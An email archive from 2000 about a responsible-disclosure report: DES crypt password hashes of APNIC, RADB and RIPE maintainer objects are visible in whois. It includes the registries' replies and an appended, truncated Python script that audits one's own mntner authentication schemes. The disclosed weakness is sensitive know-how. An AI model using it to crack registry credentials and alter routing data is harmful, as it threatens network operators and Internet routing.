From info@apnic.net  Sat Nov 25 11:00:28 2000
Return-Path: <info@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01596
	for <raju@localhost>; Sat, 25 Nov 2000 11:00:23 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:23 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5JD802123
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 00:19:14 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01324
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 15:19:05 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001318; Sat, 25 Nov 00 15:18:36 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07854;
	Sat, 25 Nov 2000 15:18:33 +1000 (EST)
Message-Id: <200011250518.PAA07854@hadrian.staff.apnic.net>
Reply-To: Request Tracker <info@apnic.net>
X-Request-ID: 62047
X-RT-Loop-Prevention: APNIC
X-Sender: _rt_system
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence: bulk 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: Request Tracker <info@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62047] (info) Crypted passwords for maintainer objects
Date: Sat, 25 Nov 2000 15:18:33 +1000 (EST)
Status: RO


-- 

Greetings,

This message has been automatically generated in response to your message
to APNIC entitled 'Crypted passwords for maintainer objects',
the content of which appears below.

APNIC has assigned the ticket number [APNIC #62047] to this matter, 
and we will respond to your query as soon as possible.


In all future correspondence about this particular matter, please ensure
that the following string is included in the subject of your message:

    [APNIC #62047]

In future correspondence with APNIC about any other matter, please ensure
that this ticket number (#62047) is NOT included, so that a new ticket can
be generated for your query.

By following these directions, your correspondence with APNIC will be
correctly tracked by our ticketing system, resulting in faster and more
reliable response to your queries.


Thanks and best regards,

-- 
APNIC


-------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer.  As you are
aware, it is trivial to brute-force crack (decode) a DES password, and
this is a serious security hole in your service.  Please treat this as
a critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi
/SkAnjdq+7pYmV5YcuoO/laYulSC56Kt
=HmKH
-----END PGP SIGNATURE-----


--- Headers Follow ---

>From info@apnic.net  Sat Nov 25 15:18:33 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07849
	for webmaster-ticket; Sat, 25 Nov 2000 15:18:33 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07845
	for <webmaster@staff.apnic.net>; Sat, 25 Nov 2000 15:18:32 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01315
	for <webmaster@apnic.net>; Sat, 25 Nov 2000 15:18:35 +1000 (EST)
Received: from delhi1.mtnl.net.in(203.94.243.51) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001297; Sat, 25 Nov 00 15:18:02 +1000
Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM)
	id KAA0000019528; Sat, 25 Nov 2000 10:44:11 +0530 (IST)
Received: (from raju@localhost)
	by ganwaar.com (8.9.3/8.9.3) id KAA01465;
	Sat, 25 Nov 2000 10:46:39 +0530
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.19255.567069.418332@localhost.localdomain>
Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST)
To: webmaster@apnic.net
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org

-------------------------------------------- Managed by Request Tracker

From info@apnic.net  Sat Nov 25 11:00:47 2000
Return-Path: <info@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01606
	for <raju@localhost>; Sat, 25 Nov 2000 11:00:42 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:42 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5NA802779
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 00:23:11 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01373
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 15:23:05 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001367; Sat, 25 Nov 00 15:22:36 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07946;
	Sat, 25 Nov 2000 15:22:36 +1000 (EST)
Message-Id: <200011250522.PAA07946@hadrian.staff.apnic.net>
Reply-To: Request Tracker <info@apnic.net>
X-Request-ID: 62049
X-RT-Loop-Prevention: APNIC
X-Sender: _rt_system
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence: bulk 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: Request Tracker <info@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62049] (info) Crypted passwords for maintainer objects
Date: Sat, 25 Nov 2000 15:22:36 +1000 (EST)
Status: RO


-- 

Greetings,

This message has been automatically generated in response to your message
to APNIC entitled 'Crypted passwords for maintainer objects',
the content of which appears below.

APNIC has assigned the ticket number [APNIC #62049] to this matter, 
and we will respond to your query as soon as possible.


In all future correspondence about this particular matter, please ensure
that the following string is included in the subject of your message:

    [APNIC #62049]

In future correspondence with APNIC about any other matter, please ensure
that this ticket number (#62049) is NOT included, so that a new ticket can
be generated for your query.

By following these directions, your correspondence with APNIC will be
correctly tracked by our ticketing system, resulting in faster and more
reliable response to your queries.


Thanks and best regards,

-- 
APNIC


-------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer.  As you are
aware, it is trivial to brute-force crack (decode) a DES password, and
this is a serious security hole in your service.  Please treat this as
a critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi
/SkAnjdq+7pYmV5YcuoO/laYulSC56Kt
=HmKH
-----END PGP SIGNATURE-----


--- Headers Follow ---

>From info@apnic.net  Sat Nov 25 15:22:35 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07937
	for webmaster-ticket; Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07930;
	Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01364;
	Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001362; Sat, 25 Nov 00 15:22:16 +1000
Received: from delhi1.mtnl.net.in (delhi1.mtnl.net.in [203.94.243.51])
	by ns.apnic.net (8.9.3/8.9.3) with ESMTP id PAA69602;
	Sat, 25 Nov 2000 15:22:00 +1000 (EST)
Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM)
	id KAA0000009261; Sat, 25 Nov 2000 10:49:21 +0530 (IST)
Received: (from raju@localhost)
	by ganwaar.com (8.9.3/8.9.3) id KAA01493;
	Sat, 25 Nov 2000 10:51:49 +0530
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.19255.567069.418332@localhost.localdomain>
Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST)
To: webmaster@apnic.net
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Sender: raju@ganwaar.com

-------------------------------------------- Managed by Request Tracker

From technical@apnic.net  Sat Nov 25 11:00:51 2000
Return-Path: <technical@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01612
	for <raju@localhost>; Sat, 25 Nov 2000 11:00:49 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:49 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5NA802780
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 00:23:11 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01374
	for <raju@linux-delhi.org>; Sat, 25 Nov 2000 15:23:05 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001368; Sat, 25 Nov 00 15:22:37 +1000
Received: (from daemon@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07957;
	Sat, 25 Nov 2000 15:22:36 +1000 (EST)
Message-Id: <200011250522.PAA07957@hadrian.staff.apnic.net>
Reply-To: Request Tracker <technical@apnic.net>
X-Request-ID: 62050
X-RT-Loop-Prevention: APNIC
X-Sender: _rt_system
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence: bulk 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: Request Tracker <technical@apnic.net>
To: raju@linux-delhi.org
Cc: 
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects
Date: Sat, 25 Nov 2000 15:22:36 +1000 (EST)
Status: RO


-- 

Greetings,

This message has been automatically generated in response to your message
to APNIC entitled 'Crypted passwords for maintainer objects',
the content of which appears below.

APNIC has assigned the ticket number [APNIC #62050] to this matter, 
and we will respond to your query as soon as possible, with the exception
of misdirected spam or network abuse reports.

For further information regarding spam or network abuse issues, please 
refer to one of the URLs below:

	http://www.apnic.net/db/spam.html
	http://www.apnic.net/db/abuse.html

In all future correspondence about this particular matter, please ensure
that the following string is included in the subject of your message:

    [APNIC #62050]

In future correspondence with APNIC about any other matter, please ensure
that this ticket number (#62050) is NOT included, so that a new 
ticket can be generated for your query.

By following these directions, your correspondence with APNIC will be
correctly tracked by our ticketing system, resulting in faster and more
reliable response to your queries.



Thanks and best regards,

-- 
APNIC


-------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer.  As you are
aware, it is trivial to brute-force crack (decode) a DES password, and
this is a serious security hole in your service.  Please treat this as
a critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi
/SkAnjdq+7pYmV5YcuoO/laYulSC56Kt
=HmKH
-----END PGP SIGNATURE-----


--- Headers Follow ---

>From info@apnic.net  Sat Nov 25 15:22:35 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07934
	for technical-ticket; Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07930;
	Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id PAA01364;
	Sat, 25 Nov 2000 15:22:35 +1000 (EST)
Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1)
	id xma001362; Sat, 25 Nov 00 15:22:16 +1000
Received: from delhi1.mtnl.net.in (delhi1.mtnl.net.in [203.94.243.51])
	by ns.apnic.net (8.9.3/8.9.3) with ESMTP id PAA69602;
	Sat, 25 Nov 2000 15:22:00 +1000 (EST)
Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM)
	id KAA0000009261; Sat, 25 Nov 2000 10:49:21 +0530 (IST)
Received: (from raju@localhost)
	by ganwaar.com (8.9.3/8.9.3) id KAA01493;
	Sat, 25 Nov 2000 10:51:49 +0530
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.19255.567069.418332@localhost.localdomain>
Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST)
To: webmaster@apnic.net
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Sender: raju@ganwaar.com

-------------------------------------------- Managed by Request Tracker

From gerald@merit.edu  Mon Nov 27 09:49:41 2000
Return-Path: <gerald@merit.edu>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA01103
	for <raju@localhost>; Mon, 27 Nov 2000 09:49:39 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Mon, 27 Nov 2000 09:49:41 +0530 (IST)
Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAQIxUp19825
	for <raju@linux-delhi.org>; Sun, 26 Nov 2000 13:59:31 -0500
Received: by backin5.merit.edu (Postfix, from userid 8975)
	id C7F8E7E540; Sun, 26 Nov 2000 13:59:28 -0500 (EST)
In-Reply-To: <14879.34070.278516.159670@localhost.localdomain> from "Raju Mathur" at Nov 25, 2000 02:53:34 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20001126185928.C7F8E7E540@backin5.merit.edu>
From: gerald@merit.edu (Gerald Andrew Winters)
To: raju@linux-delhi.org
Cc: db-admin@radb.net, irrd-team@merit.edu
Subject: Re: [RADB #15112] Crypted passwords for maintainer objects
Date: Sun, 26 Nov 2000 13:59:28 -0500 (EST)
Status: RO

Hello Raju,

Thank you for your comments.  We obviously do not want
security loopholes and appreciate your feedback.

However, showing the DES-encrypted password in the maintainer
was a decision made by the internet community and is not a local
decision by us.  (Please see ripe-120.ps for details at www.ripe.net).
The important fact is this is a community based decision.

People can use whatever level of security they wish.  You can
have no authentication to PGP authentication (see www.radb.net for
details).  We actively solicit the community to use PGP authentication
as it is very easy now to register your pgp key in the registry.  
However, the level of authentication is an individual decision and we 
cannot force anyone in this regard.

I'm sure you've also noticed that "MAIL-FROM" is a very common
form of authentication currently in use.  I think it is easier
to fake a 'mail from' header than to decode a DES password.  So there
is much room for improvement in regards to registry authentication.

All is not as bad as it may seem.  More and more users are switching
to pgp authentication and by early summer we intend to have
RFC 2725 implemented in our registry software which addresses many
security problems.

Thank you for the advance notice in regards to giving us a week
to fix this problem.  However, you are welcome to notify the community 
about this whenever you wish.

--Gerald Winters


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hi,
> 
> I see that doing a whois on a maintainer object in your whois database
> reveals the DES-encrypted password of the maintainer if s/he is using
> password as his/her authentication scheme.  As you are aware, it is
> trivial to brute-force crack (decode) a DES password, and this is a
> serious security hole in your service.  Please treat this as a
> critical issue and refrain from revealing the DES-encrypted password
> in whois lookups.
> 
> I shall be going public with this information in one week.  Request
> you to have fixed the problem by then.
> 
> Regards,
> 
> - -- Raju Mathur
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.1 (GNU/Linux)
> Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>
> 
> iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z
> FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK
> =SPnT
> -----END PGP SIGNATURE-----
> 
> 

From technical@apnic.net  Mon Nov 27 12:35:22 2000
Return-Path: <technical@apnic.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id MAA01393
	for <raju@localhost>; Mon, 27 Nov 2000 12:35:17 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Mon, 27 Nov 2000 12:35:22 +0530 (IST)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAR6vfp19661
	for <raju@linux-delhi.org>; Mon, 27 Nov 2000 01:57:42 -0500
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id QAA04131;
	Mon, 27 Nov 2000 16:57:33 +1000 (EST)
Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1)
	id xma004117; Mon, 27 Nov 00 16:57:08 +1000
Received: (from http@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id QAA25403;
	Mon, 27 Nov 2000 16:57:04 +1000 (EST)
Message-Id: <200011270657.QAA25403@hadrian.staff.apnic.net>
Reply-To: Bruce Campbell via RT <technical@apnic.net>
X-Request-ID: 62050
X-RT-Loop-Prevention: APNIC
X-Sender: bc
X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt)
Precedence:  
X-RT-MIME-Found: No
From: Bruce Campbell via RT <technical@apnic.net>
To: raju@linux-delhi.org
Cc: ripe-dbm@ripe.net
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects
Date: Mon, 27 Nov 2000 16:57:04 +1000 (EST)
Status: RO

raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36):

> I see that doing a whois on a maintainer object in your whois database
> reveals the DES-encrypted password of the maintainer.  As you are
> aware, it is trivial to brute-force crack (decode) a DES password, and
> this is a serious security hole in your service.  Please treat this as
> a critical issue and refrain from revealing the DES-encrypted password
> in whois lookups.

The APNIC Whois Databases uses code developed by our sister organisation for
Europe (the RIPE NCC) and shares many of the same issues.  The issue regarding
the visibility of the 'auth' attribute in the maintainer object has been
discussed before, however I regret that I am unable to find an online
reference for this discussion.

I am cc'ing the appropriate address in the RIPE NCC in the hopes that they
can provide a more definitive reference ( a reply to the APNIC ticketing
system will also reply to the original requestor ).

> I shall be going public with this information in one week.  Request
> you to have fixed the problem by then.

Kind regards,

-- 
  Bruce Campbell <bruce.campbell@apnic.net>                 +61-7-3367-0490
                      Systems Administrator      Regional Internet Registry
    Asia Pacific Network Information Centre     For the Asia Pacific Region
                   http://www.apnic.net/db/                 whois.APNIC.net



-------------------------------------------- Managed by Request Tracker

From ripe-dbm@ripe.net  Wed Nov 29 20:30:02 2000
Return-Path: <ripe-dbm@ripe.net>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id UAA03174
	for <raju@localhost>; Wed, 29 Nov 2000 20:29:59 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Wed, 29 Nov 2000 20:29:59 +0530 (IST)
Received: from birch.ripe.net (birch.ripe.net [193.0.1.96])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATAX1m12431
	for <raju@linux-delhi.org>; Wed, 29 Nov 2000 05:33:02 -0500
Received: from ripe.net (office.ripe.net [193.0.1.97])
	by birch.ripe.net (8.8.8/8.8.8) with ESMTP id LAA24135;
	Wed, 29 Nov 2000 11:31:26 +0100 (CET)
Message-Id: <200011291031.LAA24135@birch.ripe.net>
In-reply-to: Your message of Mon, 27 Nov 2000 13:17:01 +0530.
             <14882.4469.52414.25633@localhost.localdomain> 
References: <14882.4469.52414.25633@localhost.localdomain> 
X-Organization: RIPE Network Coordination Centre
X-Phone: +31 20 535 4444
X-Fax: +31 20 535 4445
From: RIPE Database Administration <ripe-dbm@ripe.net>
Sender: ripe-dbm@ripe.net
To: raju@linux-delhi.org
cc: Bruce Campbell via RT <technical@apnic.net>,
        gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net,
        irrd-team@merit.edu
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
Date: Wed, 29 Nov 2000 11:31:25 +0100
Status: RO

Dear Raju Mathur,

This matter was originally raised in October 1994, when the RIPE document
ripe-120 (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published:

"It is by no means meant to keep out a determined malicious attacker. The
crypt function is vulnerable to exhaustive search by (lots of) fast
machines and programs to do the searching are widely available.  For
this reason it is strongly discouraged to use encrypted passwords also
used for other purposes such as Unix login accounts in this scheme. As you
are publishing the encrypted password in the database it is open to attack."

This was re-stated in ripe-153 (published in January 1997) and in ripe-157
(published in May 1997).  In November 1998, ripe-189 was published, in which
the RIPE NCC announced that it was supporting PGP authentication in the RIPE 
Database (the scheme is also described in RFC-2726).  In January 1999, the 
RIPE NCC published ripe-190, offering free PGP licences on request, to 
anyone who had a mntner object in the RIPE Database.  At every RIPE Meeting 
since that time, the RIPE NCC has encouraged the RIPE community to adopt PGP 
authentication.

The RIPE NCC does not manage the data in the RIPE Network Management Database.
The responsibility for maintaining and protecting the data is with those who
put the data in there.  However, the RIPE NCC has provided a PGP authentication
scheme and encourages its use.  

You give a one-week deadline before you make a public statement about this.  We
cannot unilaterally change the functionality of the RIPE Database; we only act on
the instructions of the RIPE Database Working Group, which has a mailing list:
<db-wg@ripe.net>.  We invite you to express your concerns on that list.

BTW, this is the first message from you that I have seen.  I am investigating if
we received any other message from you previous to this one.

If you have any more questions, please contact
<ripe-dbm@ripe.net>.

Kind regards,

A. M. R. Magee
______________
RIPE NCC 


 Raju Mathur <raju@linux-delhi.org> writes:
 * -----BEGIN PGP SIGNED MESSAGE-----
 * Hash: SHA1
 * 
 * Hi Bruce,
 * 
 * I've already sent a copy of this mail to RIPE and RADB.  RADB's reply
 * basically states that ``it's what the users want, so our hands are
 * tied'', which isn't very heartening.  I'm still awaiting a response
 * from RIPE.
 * 
 * While I agree that users (in general) should be given what they want,
 * I would still not (for example) allow a password-less account as a
 * Unix system administrator.  I have yet to evaluate the extent of
 * damage that a person with a cracked APNIC, RIPE or RADB password could
 * do, but I suspect that it could be pretty serious, at least in the
 * short term.  I presume that even if someone manages to change an
 * object in your database the owner/maintainer of that object would
 * still be notified and have the option of correcting the issue; however
 * even a short-term rogue change in the database can have global routing
 * and security implications (e.g. a change in the in-addr.arpa database
 * could be the precursor for major security breaches).
 * 
 * Please allow me to reiterate that the policy of displaying CRYPT-PW
 * passwords without control is viewed by me personally with great
 * concern, and I suspect that that is the view most security
 * professionals also would take.  My objective is to have a secure,
 * stable Internet, and I'm willing to do anything in power to work
 * towards this goal.  If one of those tasks is to bring potential
 * security holes into the limelight, I shall do that (by posting to
 * BUGTRAQ and CERT, albeit reluctantly); before that, however, I would
 * request you again to fix the problem at the source rather than have
 * half the script-kiddies in the world trying to attack your databases,
 * and maybe succeeding.
 * 
 * Regards,
 * 
 * - -- Raju
 * 
 * >>>>> "Bruce" == Bruce Campbell via RT <technical@apnic.net> writes:
 * 
 *     Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36):
 *     >> I see that doing a whois on a maintainer object in your whois
 *     >> database reveals the DES-encrypted password of the maintainer.
 *     >> As you are aware, it is trivial to brute-force crack (decode) a
 *     >> DES password, and this is a serious security hole in your
 *     >> service.  Please treat this as a critical issue and refrain
 *     >> from revealing the DES-encrypted password in whois lookups.
 * 
 *     Bruce> The APNIC Whois Databases uses code developed by our sister
 *     Bruce> organisation for Europe (the RIPE NCC) and shares many of
 *     Bruce> the same issues.  The issue regarding the visibility of the
 *     Bruce> 'auth' attribute in the maintainer object has been
 *     Bruce> discussed before, however I regret that I am unable to find
 *     Bruce> an online reference for this discussion.
 * 
 *     Bruce> I am cc'ing the appropriate address in the RIPE NCC in the
 *     Bruce> hopes that they can provide a more definitive reference ( a
 *     Bruce> reply to the APNIC ticketing system will also reply to the
 *     Bruce> original requestor ).
 * 
 *     >> I shall be going public with this information in one week.
 *     >> Request you to have fixed the problem by then.
 * 
 *     Bruce> Kind regards,
 * 
 *     Bruce> -- Bruce Campbell <bruce.campbell@apnic.net>
 *     Bruce> +61-7-3367-0490 Systems Administrator Regional Internet
 *     Bruce> Registry Asia Pacific Network Information Centre For the
 *     Bruce> Asia Pacific Region http://www.apnic.net/db/
 *     Bruce> whois.APNIC.net
 * 
 * 
 * 
 *     Bruce> -------------------------------------------- Managed by
 *     Bruce> Request Tracker
 * -----BEGIN PGP SIGNATURE-----
 * Version: GnuPG v1.0.1 (GNU/Linux)
 * Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>
 * 
 * iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb
 * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF
 * =mKDL
 * -----END PGP SIGNATURE-----
 * 
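Added example, not part of the correspondence and not code from APNIC, RADB or RIPE: an audit of your own mntner objects for the authentication levels the replies above describe (no authentication, MAIL-FROM, CRYPT-PW, PGP). Assumptions: the attribute spellings `NONE` and `PGPKEY-<id>` follow RIPE-style registries, any single `auth:` line is taken to be sufficient to authorise an update, and the sample objects are constructed.

```python
# Added example: classify the auth: attributes of mntner objects and report
# the effective (weakest) scheme for each. Sample data below is constructed.

# Weakest first. Because any one auth: line is assumed sufficient for an
# update, the weakest line present sets the real protection level.
STRENGTH = {"NONE": 0, "MAIL-FROM": 1, "CRYPT-PW": 2, "PGPKEY": 3}

SAMPLE = r"""
% constructed sample, not real registry data
mntner:  MAINT-EXAMPLE-A
descr:   Example maintainer using password authentication
auth:    CRYPT-PW XXXXXXXXXXXXX
mnt-by:  MAINT-EXAMPLE-A

mntner:  MAINT-EXAMPLE-B
auth:    PGPKEY-0A1B2C3D
auth:    MAIL-FROM .*@example\.net

mntner:  MAINT-EXAMPLE-C
auth:    PGPKEY-0A1B2C3D

person:  Example Person
nic-hdl: EP1-EXAMPLE
"""


def parse_objects(text):
    """Split whois output into objects, each a list of (attribute, value)."""
    objects, current = [], []
    for line in text.splitlines():
        if line.startswith(("%", "#")):        # server remarks and comments
            continue
        if not line.strip():                    # a blank line ends an object
            if current:
                objects.append(current)
                current = []
            continue
        if line[0] in " \t+" and current:       # continuation of last value
            name, value = current[-1]
            current[-1] = (name, (value + " " + line[1:].strip()).strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            current.append((name.strip().lower(), value.strip()))
    if current:
        objects.append(current)
    return objects


def classify_auth(value):
    """Map one auth: value to a scheme name, or UNKNOWN if unrecognised."""
    parts = value.split()
    token = parts[0].upper() if parts else ""
    if token.startswith("PGPKEY-"):
        return "PGPKEY"
    return token if token in STRENGTH else "UNKNOWN"


def audit_mntners(text):
    """Return one finding per mntner object found in the whois text."""
    findings = []
    for obj in parse_objects(text):
        if obj[0][0] != "mntner":               # skip person, route, etc.
            continue
        schemes = [classify_auth(v) for n, v in obj if n == "auth"]
        if schemes:
            # Unrecognised schemes rank lowest so they get a manual review.
            effective = min(schemes, key=lambda s: STRENGTH.get(s, -1))
        else:
            effective = "MISSING"
        findings.append({
            "mntner": obj[0][1],
            "schemes": schemes,
            "effective": effective,
            # The hash is visible to anyone who can query the object.
            "hash_published": "CRYPT-PW" in schemes,
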